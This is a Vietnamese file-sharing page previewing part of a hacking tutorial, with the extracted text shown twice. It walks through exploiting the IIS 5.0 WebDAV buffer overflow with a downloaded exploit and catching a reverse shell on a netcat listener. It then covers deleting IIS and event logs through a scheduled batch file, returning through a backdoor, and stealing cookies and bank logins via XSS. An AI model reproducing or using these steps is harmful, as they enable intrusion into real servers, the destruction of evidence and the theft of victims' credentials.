Những hiểu biết cơ bản nhất để trở thành Hacker phần 4
Số trang: 12
Loại file: pdf
Dung lượng: 115.66 KB
Lượt xem: 10
Lượt tải: 0
Xem trước 2 trang đầu tiên của tài liệu này:
Thông tin tài liệu:
Những hiểu biết cơ bản nhất để trở thành Hacker phần 4 50 . ) Kỹ thuật hack server thông qua lỗi tràn bộ đệm WebDAV : Giới thiệu : Giao thức World Wide Web Distributed Authoring and Versioning (WebDAV) là một tập hợp các mở rộng cho giao thức HTTP dùng để cung cấp một cách thức chuẩn cho việc biên tập và quản lý file giữa các máy tính trên Internet.
Nội dung trích xuất từ tài liệu:
Những hiểu biết cơ bản nhất để trở thành Hacker phần 4Những hiểu biết cơ bản nhất để trở thành Hacker phần 4trang này đã được đọc lần50 . ) Kỹ thuật hack server thông qua lỗi tràn bộ đệm WebDAV : Giới thiệu : Giao thức World Wide Web Distributed Authoring andVersioning (WebDAV) là một tập hợp các mở rộng cho giao thứcHTTP dùng để cung cấp một cách thức chuẩn cho việc biên tập vàquản lý file giữa các máy tính trên Internet. Lỗi tràn bộ đệm đã đượcphát hiện trong một thành phần của Windows 2000 được sử dụngbởi WebDAV có thể cho phép kẻ tấn công chiếm quyền điều khiểnmáy tính . Chuẩn bị : Ngoài những đồ nghề đã giới thiệu ở các bài trước , cácbạn hãy vào down thêm www32.brinkster.com/anhdenday/wb.zipextract để ở trong C: Khai thác :+ Tìm một trang Web dùng IIS 5.0+ Vào Dos , vào đặt NETCAT ở chế độ lắng nghe :C:>nx -vv -l -p 53listening on [any] 53 ...Ta để nó lắng nghe ở cổng 53 vì tường lửa ko chặn cổng này .+ Mở thêm một của sổ DOS nữa .+ Ta sử dụng WebDAV vừa down về .c:wb.exe [padding=1,2,3...]VD :C:> webdav xxx.xxx.xxx.xxx 203.162.xxx.xxx 53 1[Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt]www.coromputer.net && undernet #coromputerChecking WebDav on xxx.xxx.xxx.xxx ... FOUNDexploiting ntdll.dll through WebDav [ret: 0x00100010]Connecting... CONNECTEDSending evil request... SENTNow if you are lucky you will get a shell.+ Nếu như may mắn bạn có thể lấy được shell của máy chủ IIS . Nếunhư ở máy tính dùng để tấn công hiện ra kết quả như sau thì bạn đãcó shell rồi đó :C:>nc -vv -l -p 53listening on [any] 53 ...connect to [203.162.xxx.xxx] from xxx.xxx.xxx.xxx[xxx.xxx.xxx.xxx]1125Microsoft Windows 2000 [Version 5.00.2195](C) Copyright 1985-2000 Microsoft Corp.C:WINNTsystem32> reg queryHKLMSYSTEMCurrentControlSetServicesW3SVCParameters /vLogFileDirectory ! REG.EXE VERSION 2.0kết quả nó sẽ xuất hiện link để ta xác định file log :HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesW3SVCParameters LogFileDirectory REG_SZ C: WINNTSystem32LogFilesHe he , đường dẫn file log là C:WINNTSystem32LogFiles+ Ta tạo một file a.bat trên máy của nạn nhân để thực hiện việc xoáfile log này , ta đánh các lệnh sau :C:WINNTsystem32>echo iisreset /stop >a.bat tạm dừng serverIISC:WINNTsystem32>echo rd /q /s C:WINNTSystem32LogFiles>>a.bat xóa nhật kí của IISC:WINNTsystem32>echo iisreset /start >>a.bat khởi động lại IISC:WINNTsystem32>echo ce >>a.bat xóa nhật kí của Event LogC:WINNTsystem32>echo del a.bat >>a.bat xóa file a.bat+ Sau đó ta dùng các lệnh sau để cho flie a.bat kia làm việc :C:WINNTsystem32>net time xxx.xxx.xxx.xxx lấy thời gian hiệntại của máy chủNó sẽ cho kết quả như VD sau :Current time at xxx.xxx.xxx.xxx is dd/mm/yy 3:00 PMThe command completed successfullyNhư vậy thờI gian hiện tạI trên máy chủ là 15:00 , ta sẽ cho filea.bat làm việc sau 5 phút nữa bằng lệnh sau :C:WINNTsystem32>at 15:05 a.batAdded a new job with job ID = 1Ta có thể mặc đinh cho file a.bat tự động làm việc sau bao lâu là tuỳvào thông số thời gian bạn đưa vào .Ta thoát khỏi máy chủ bằng lệnh :C:WINNTsystem32>exit đóng kết nốisent 207, rcvd 746+ Lúc này thì mấy admin có tài thánh cũng ko biết là đã có ngườithâm nhập._ Sau này các bạn muốn quay lại cái server trên thì ta đột nhập trựctiếp thông qua backdoor các bạn đã up lên._ Kèm theo file Wb.exe tôi đã để thêm 2 file nữa đó là :+ xoafilelog.exe : dùng để xoá file log trong server của victim .+ wbscaniis.xpn : dùng để quét xem server victim có bị lỗi này cho takhai thác hay không , các bạn tự tìm hiểu để sử dụng chúng nhé.51 . ) Lỗi CROSS SITE SCRIPTING và cách khai thác :Giới thiệu : Lỗi XSS ( tên gọi của Cross-Site Scripting ) nói nôm na làhacker có thể thông qua lỗi này để chèn code vào site hay link đểchôm các thông tin quan trọng từ nạn nhân, các thông tin quan trọngở đây có thể là cookie hoặc username + pass để vào tài khoản 1ngân hàng nào đó sau đó thông tin này được gửi tới cho hacker . Chuẩn bị :+ Lấy đoạn code sau save lại thành file cookie.asp rồi up lên host củabạn có hỗ trợ asp ( như brikster.com ) :Kiểm tra trang Web bị lỗi :+ 1 site bất kì bao giờ cũng có 1 hoặc tất cả các phần sau : searchresults, error messages , Web-form , chủ yếu lỗi XSS nằm ở các phầnnày , nói chung là XSS có thể xảy ra ở chỗ nào mà người dùng có thểnhập dữ liệu vào và sau đó sẽ nhận được 1 cái gì đó .+ Cách tìm lỗi ta chia thành 4 bước :Bước 1 : Mở website cần kiểm tra .Bước 2 : Bắt đầu kiểm tra , định vị 1 ô tìm kiếm hoặc 1 login form vàgửi thông tin đi (nhập thông tin và nhấn submit hay login hay ok gìđó ) , ví dụ nhập chữ abc chẳng hạn hay chữ gì cũng được .Bước 3 : Xác định khả năng site có bị lỗi XSS hay không bằng cáchxem thông tin trả về :Ví dụ bạn thấy như thế này :Your search for abc did not find any itemsYour sear ...
Nội dung trích xuất từ tài liệu:
Những hiểu biết cơ bản nhất để trở thành Hacker phần 4Những hiểu biết cơ bản nhất để trở thành Hacker phần 4trang này đã được đọc lần50 . ) Kỹ thuật hack server thông qua lỗi tràn bộ đệm WebDAV : Giới thiệu : Giao thức World Wide Web Distributed Authoring andVersioning (WebDAV) là một tập hợp các mở rộng cho giao thứcHTTP dùng để cung cấp một cách thức chuẩn cho việc biên tập vàquản lý file giữa các máy tính trên Internet. Lỗi tràn bộ đệm đã đượcphát hiện trong một thành phần của Windows 2000 được sử dụngbởi WebDAV có thể cho phép kẻ tấn công chiếm quyền điều khiểnmáy tính . Chuẩn bị : Ngoài những đồ nghề đã giới thiệu ở các bài trước , cácbạn hãy vào down thêm www32.brinkster.com/anhdenday/wb.zipextract để ở trong C: Khai thác :+ Tìm một trang Web dùng IIS 5.0+ Vào Dos , vào đặt NETCAT ở chế độ lắng nghe :C:>nx -vv -l -p 53listening on [any] 53 ...Ta để nó lắng nghe ở cổng 53 vì tường lửa ko chặn cổng này .+ Mở thêm một của sổ DOS nữa .+ Ta sử dụng WebDAV vừa down về .c:wb.exe [padding=1,2,3...]VD :C:> webdav xxx.xxx.xxx.xxx 203.162.xxx.xxx 53 1[Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt]www.coromputer.net && undernet #coromputerChecking WebDav on xxx.xxx.xxx.xxx ... FOUNDexploiting ntdll.dll through WebDav [ret: 0x00100010]Connecting... CONNECTEDSending evil request... SENTNow if you are lucky you will get a shell.+ Nếu như may mắn bạn có thể lấy được shell của máy chủ IIS . Nếunhư ở máy tính dùng để tấn công hiện ra kết quả như sau thì bạn đãcó shell rồi đó :C:>nc -vv -l -p 53listening on [any] 53 ...connect to [203.162.xxx.xxx] from xxx.xxx.xxx.xxx[xxx.xxx.xxx.xxx]1125Microsoft Windows 2000 [Version 5.00.2195](C) Copyright 1985-2000 Microsoft Corp.C:WINNTsystem32> reg queryHKLMSYSTEMCurrentControlSetServicesW3SVCParameters /vLogFileDirectory ! REG.EXE VERSION 2.0kết quả nó sẽ xuất hiện link để ta xác định file log :HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesW3SVCParameters LogFileDirectory REG_SZ C: WINNTSystem32LogFilesHe he , đường dẫn file log là C:WINNTSystem32LogFiles+ Ta tạo một file a.bat trên máy của nạn nhân để thực hiện việc xoáfile log này , ta đánh các lệnh sau :C:WINNTsystem32>echo iisreset /stop >a.bat tạm dừng serverIISC:WINNTsystem32>echo rd /q /s C:WINNTSystem32LogFiles>>a.bat xóa nhật kí của IISC:WINNTsystem32>echo iisreset /start >>a.bat khởi động lại IISC:WINNTsystem32>echo ce >>a.bat xóa nhật kí của Event LogC:WINNTsystem32>echo del a.bat >>a.bat xóa file a.bat+ Sau đó ta dùng các lệnh sau để cho flie a.bat kia làm việc :C:WINNTsystem32>net time xxx.xxx.xxx.xxx lấy thời gian hiệntại của máy chủNó sẽ cho kết quả như VD sau :Current time at xxx.xxx.xxx.xxx is dd/mm/yy 3:00 PMThe command completed successfullyNhư vậy thờI gian hiện tạI trên máy chủ là 15:00 , ta sẽ cho filea.bat làm việc sau 5 phút nữa bằng lệnh sau :C:WINNTsystem32>at 15:05 a.batAdded a new job with job ID = 1Ta có thể mặc đinh cho file a.bat tự động làm việc sau bao lâu là tuỳvào thông số thời gian bạn đưa vào .Ta thoát khỏi máy chủ bằng lệnh :C:WINNTsystem32>exit đóng kết nốisent 207, rcvd 746+ Lúc này thì mấy admin có tài thánh cũng ko biết là đã có ngườithâm nhập._ Sau này các bạn muốn quay lại cái server trên thì ta đột nhập trựctiếp thông qua backdoor các bạn đã up lên._ Kèm theo file Wb.exe tôi đã để thêm 2 file nữa đó là :+ xoafilelog.exe : dùng để xoá file log trong server của victim .+ wbscaniis.xpn : dùng để quét xem server victim có bị lỗi này cho takhai thác hay không , các bạn tự tìm hiểu để sử dụng chúng nhé.51 . ) Lỗi CROSS SITE SCRIPTING và cách khai thác :Giới thiệu : Lỗi XSS ( tên gọi của Cross-Site Scripting ) nói nôm na làhacker có thể thông qua lỗi này để chèn code vào site hay link đểchôm các thông tin quan trọng từ nạn nhân, các thông tin quan trọngở đây có thể là cookie hoặc username + pass để vào tài khoản 1ngân hàng nào đó sau đó thông tin này được gửi tới cho hacker . Chuẩn bị :+ Lấy đoạn code sau save lại thành file cookie.asp rồi up lên host củabạn có hỗ trợ asp ( như brikster.com ) :Kiểm tra trang Web bị lỗi :+ 1 site bất kì bao giờ cũng có 1 hoặc tất cả các phần sau : searchresults, error messages , Web-form , chủ yếu lỗi XSS nằm ở các phầnnày , nói chung là XSS có thể xảy ra ở chỗ nào mà người dùng có thểnhập dữ liệu vào và sau đó sẽ nhận được 1 cái gì đó .+ Cách tìm lỗi ta chia thành 4 bước :Bước 1 : Mở website cần kiểm tra .Bước 2 : Bắt đầu kiểm tra , định vị 1 ô tìm kiếm hoặc 1 login form vàgửi thông tin đi (nhập thông tin và nhấn submit hay login hay ok gìđó ) , ví dụ nhập chữ abc chẳng hạn hay chữ gì cũng được .Bước 3 : Xác định khả năng site có bị lỗi XSS hay không bằng cáchxem thông tin trả về :Ví dụ bạn thấy như thế này :Your search for abc did not find any itemsYour sear ...
Tìm kiếm theo từ khóa liên quan:
tài liệu window thủ thuật window thủ thuật tin học bí quyết bảo mật phương pháp bảo mậtGợi ý tài liệu liên quan:
-
Cách phân tích thiết kế hệ thống thông tin quan trọng phần 4
13 trang 217 0 0 -
Sửa lỗi các chức năng quan trọng của Win với ReEnable 2.0 Portable Edition
5 trang 213 0 0 -
Bài giảng điện tử môn tin học: Quản trị các hệ thống thông tin quản lý xuyên quốc gia
27 trang 211 0 0 -
Các phương pháp nâng cấp cho Windows Explorer trong Windows
5 trang 199 0 0 -
Tổng quan về ngôn ngữ lập trình C part 1
64 trang 195 0 0 -
Thủ thuật với bàn phím trong Windows
3 trang 166 0 0 -
bảo mật mạng các phương thức giả mạo địa chỉ IP fake IP
13 trang 159 0 0 -
TÀI LIỆU HƯỚNG DẪN SỬ DỤNG PHẦN MỀM KHAI BÁO HẢI QUAN ĐIỆN TỬ phần 1
18 trang 158 0 0 -
Các cách phát hiện PC và email của bạn có bị theo dõi hay không?
8 trang 80 0 0 -
3 nguyên tắc vàng để luôn an toàn khi duyệt web
8 trang 76 0 0